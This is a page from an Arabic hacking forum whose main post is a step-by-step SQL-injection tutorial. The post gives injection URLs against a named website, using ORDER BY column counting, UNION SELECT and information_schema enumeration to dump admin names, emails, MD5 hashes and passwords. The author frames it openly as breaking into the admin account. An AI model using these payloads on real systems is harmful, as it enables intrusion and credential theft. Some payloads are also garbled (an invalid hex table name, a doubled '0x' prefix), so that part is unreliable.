منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
عزيزي الزائر عزيزتي الزائرة يرجي التكرم بتسجبل الدخول
لي اجل تستطيع اطهار جميع المواضيع والاقسام
اذا كنت عضو معنا

او التسجيل ان لم تكن عضو وترغب في الانضمام الي المنتدي

نتشرف بتسجيل

ادارة المنتدى

منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات

منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقاأكبر منتدى هكر عربي متخصص بجديد الثغرات واختراق المواقع والأجهزة.منتدى إختراق البريد والايميلات- قسم اختراق دورة إحتراف التلغيمدورة اختراق IPs من نوع SIPو VOIP‎دورة كشف التلغيم‎دورة اختراق الأجهزة‎دورة
 
الرئيسيةالتسجيلدخول


تحياتي لك الباب مفتوح لي في جميع الاقسام الذي تريده عند المشاركه  اي استفسار انا جاهز ان شاء الله
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
سحابة الكلمات الدلالية
المواضيع الأخيرة
» عملاق التحميل من التورنت Vuze 5.6.0.0 الجديد كليا واحدث الادوات والاصدرات
السبت مارس 07, 2015 11:36 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» برنامج FastPictureViewer 1.9 Build 342 لتعديل و عرض الصور بكل سهوله
الأربعاء مارس 04, 2015 3:57 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» احدث فلود اضافات روم 2015
الأربعاء مارس 04, 2015 10:20 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]VB6[ أفضل الطرق لتجميل برامجك شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:58 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثالث -الجمل الشرطية و الدوارات شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:55 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثاني -المتغيرات شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:53 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ الدرس الاول تعلم خطوة بخطوة , مع الإجابة عن أي سؤال شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:52 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الثانية اضافةالبيانات بالـ LINQ شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:47 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الاولى لأستيعاب الـ LINQ شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:45 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ عمل برامج للاجهزه النقاله والPDA‏ شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:41 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» تطبيق لزيادة سرعة الجهاز Greenify )ROOT( v2.5.2 Final‏ شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:29 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» برنامج Auslogics BoostSpeed 7.8.1.0 لتسريع الكمبيوتر وعمل صيانة شاملة له
الثلاثاء مارس 03, 2015 10:25 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» افضل واقوى البرامج لاستعادة جميع ملفاتك المحذوفه iOrgSoft Data Recovery 1.0.6 شبكة الجنرال صدام الشرعبي
الإثنين مارس 02, 2015 5:29 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

أكتوبر 2017
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
      1
2345678
9101112131415
16171819202122
23242526272829
3031     
اليوميةاليومية
التبادل الاعلاني

انشاء منتدى مجاني



أفضل 10 فاتحي مواضيع
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے
 
جنـرال الـهكـر
 
رابح..زيرؤ.فؤر.ايفر
 
ابوعلي
 
سنايبر1
 
ملك الهكر
 
العاشق
 
الساحر
 
__alsafa7__
 
صدام الشرعبي
 
أفضل 10 أعضاء في هذا المنتدى
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے - 1848
 
رابح..زيرؤ.فؤر.ايفر - 300
 
جنـرال الـهكـر - 227
 
سنايبر1 - 146
 
ابوعلي - 55
 
العاشق - 49
 
نسيـم البحـر1 - 27
 
ملك الهكر - 27
 
لووورد اليمن - 24
 
__alsafa7__ - 18
 
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية Digg  تسجيل صفحاتك المفضلة في مواقع خارجية Delicious  تسجيل صفحاتك المفضلة في مواقع خارجية Reddit  تسجيل صفحاتك المفضلة في مواقع خارجية Stumbleupon  تسجيل صفحاتك المفضلة في مواقع خارجية Slashdot  تسجيل صفحاتك المفضلة في مواقع خارجية Yahoo  تسجيل صفحاتك المفضلة في مواقع خارجية Google  تسجيل صفحاتك المفضلة في مواقع خارجية Blinklist  تسجيل صفحاتك المفضلة في مواقع خارجية Blogmarks  تسجيل صفحاتك المفضلة في مواقع خارجية Technorati  

http://sadam-alsharabi.roo7.biz

قم بحفض و مشاطرة الرابط منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات على موقع حفض الصفحات
تصويت
احصائيات
هذا المنتدى يتوفر على 2282 عُضو.
آخر عُضو مُسجل هو goran فمرحباً به.

أعضاؤنا قدموا 3049 مساهمة في هذا المنتدى في 2052 موضوع

شاطر | 
 

 الدرس ثاني-كيفية كتشاف ثغرات جزء اول

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
جنـرال الـهكـر

avatar

السٌّمعَة : 4
تاريخ التسجيل : 20/04/2014
الموقع : http://sadam-alsharabi.roo7.biz

مُساهمةموضوع: الدرس ثاني-كيفية كتشاف ثغرات جزء اول   الثلاثاء مايو 13, 2014 10:52 am

بسم الله الرحمن الرحيم‎

اليوم و في درسنا هذا ريحين نشرح كيفية اكتشاف الثغرات خطوة بخطوة

لتعريف Sql injection : وهي ثغرات تحدث في حال إدخال متغير ما على إستعلام (query) للغة قواعد البيانات mysql ومن ثم توجيه إستعلامات مخصصه لإستغلال مثل هذه الثغرات لنحصل على الهدف النهائي وهو إستخراج المعلومات من قاعدة البيانات بشكل كامل و  غير شرعي , ويوجد للثغرة عدة لنذكر إثنين منها : 

    error based sql injection
    blind sql injection

في النوع الأول يكون إستغلال الثغرة ميسر ومن دون اي مشاكل وبسرعه تامه.

اما في النوع الثاني تكون المشاكل في تخمين إسم ونوع الجداول والصفوف مما يؤدي إلا تأخر العمليه (ولكنها تتم بالنهاية).

ومن الجدير بالذكر أيضاً أن هذه الثغرات تستهدف الكثير من اللغات البرمجية مثل php , java , asp , aspx.

نبدء في طريقة White Box والتي سوف نقوم بشرح أكودا الثغرة المكتوبه بلغة Php بالإعتماد على لغة Mysql


[sor2]http://upload.sa3eka.com/do.php?img=4171[/sor2]

نلاحظ في الصورة السابقه ولنشرح المكونات

    السكربت يعمل إدراج لملف config.php والذي يتصل بدورة بقواعد البيانات.
    السطر رقم 5 نلاحظ تعريف المتغير name بالقيمه المدخله من نوع POST والتي تتمثل بالحقل name.
    بالسطر رقم 7 نلاحظ عمل إستعلام (mysql query ) والذي يحاول إختيار جميع الحقول الموجوده في الجدول name ومطابقتها مع المتغير.
    بالسطر رقم 14 نشاهد عنوان ومعلومات النموذج (form) وهي قيمه POST كوسيلة لإرسال البيانات ومعالجتها بملف index.php.

لنأتي الأن لشرح تفاصيل الثغرة ومعرفة كيفية حدوثها , نشاهد أن المتغير لم يفلتر ولم يحدد ما هو من قبل المبرمج لذلك يسمع بإدخال جميع الأوامر والتعابير إلى الإستعلام مما يمكن حقن كود يؤدي لحدوث خطأ ينتج عنه ثغرة sql injection يؤدي إلى إستخراج جميع المعلومات الموجوده في خادم قواعد البيانات. هكذا نكون فسرنا الكود وإكتشفنا الثغرة الموجوده بالسكربت بكل سهوله من خلال قرأة المدخلات والتحقق من عدم فلترتها.

الأن لنأتي إلى إستكشاف الصفحه ومن ثم محاولة إستغلال الثغرة, لنلقي الأن نظرة على الفورم من خلال هذه الصورة


[sor2]http://upload.sa3eka.com/do.php?img=4172[/sor2]


نلاحظ وجود فورم بسيط , لنحاول إدخال أي قيمه لنلاحظ ان الفورم لم يحرك ساكن ! ممتاز لنحاول الأن إدخال علامه (‘) single quote ومن ثم ملاحظه ما سوف يحدث من خلال هذه الصورة

[sor2]http://upload.sa3eka.com/do.php?img=4173[/sor2]


حلو الكلام 

وفي طريقة اليدوية يعني بدون برامج مثلا

نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

الكود:
order by 1-- 
  
order by 5-- 
  
order by 10-- 
  
order by 15--
[color][size]


لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا


[/size][/color]
الكود:
order by 1/*  
[color][size]


order by 15--

هنا ظهر الخطأ 

النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

[/size][/color]يصير الرابط هيك

الكود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

  




الان لنعرف اصدار القاعده
نكتب

الكود:
version()  



بعض الاوامر


database()
version()
user()
الان نضيف  للحقنه 
 
الكود:
concat(table_name,0x3a,column_name,0x3a,table_schema)  


الكود:
+from+information_schema.columns--  


فتصبح



الكود:
 
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns--  



الان نضيف الامر التالي

[sor2]http://upload.sa3eka.com/do.php?img=4174[/sor2]


ههههههههه تفائلو

الكود:
 
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37) 



الكود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--  



شوف اخي اطلع ع النتائج بتلقى الجداول المهمه هي
الادمن
اليوزر
بس احنا بدنا نخترق الادمن وهو المتوقع هدفنا يلا نصيده

SurveyAdmins:admin_password:SURVEYS
SurveyAdmins:admin_md5_password:SURVEYS


 انتو شايفين عنا خيارين  الاول هو الي مطلوب نشوف كيف نعمل
ندخل لي هذا الموقع

الكود:
http://www.waraxe.us/sql-char-encoder.html  


تشفير اسم الجدول وعنا اسم الجدول هو   مثلا    SurveyAdmins نوع التشفير هو  مثلا


الكود:
MySql hex-encoded string  



يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر   where+table_name=  يعني هيك

الكود:
where+table_name=0x15248796335b5tr55  



الاستغلال

 
الكود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x0x15248796335b5tr55--  




ما شاء الله طلع لنا خيارات كثيره   الان خلينا نجمع الاستغلال  اسم الجدول  SurveyAdmins  

 نجمعها كلها مع بعض بالامر  concat   وبتصير هيك  concat(name,0x3a,pass)[/COLOR]
الكود:
 ;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm;  

نجمعهم الامر

الكود:
concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm)  


نركبه بالحقنه

الكود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins--  



[COLOR="DarkOrange"][SIZE="4"]انتهى الجزء اول من شرح ثغرات انتضرونا في الحلقة القادمة ان شاءالله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
الدرس ثاني-كيفية كتشاف ثغرات جزء اول
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات :: الفئة الأولى :: قسم اختراق المواقع وسيرفرات-
انتقل الى: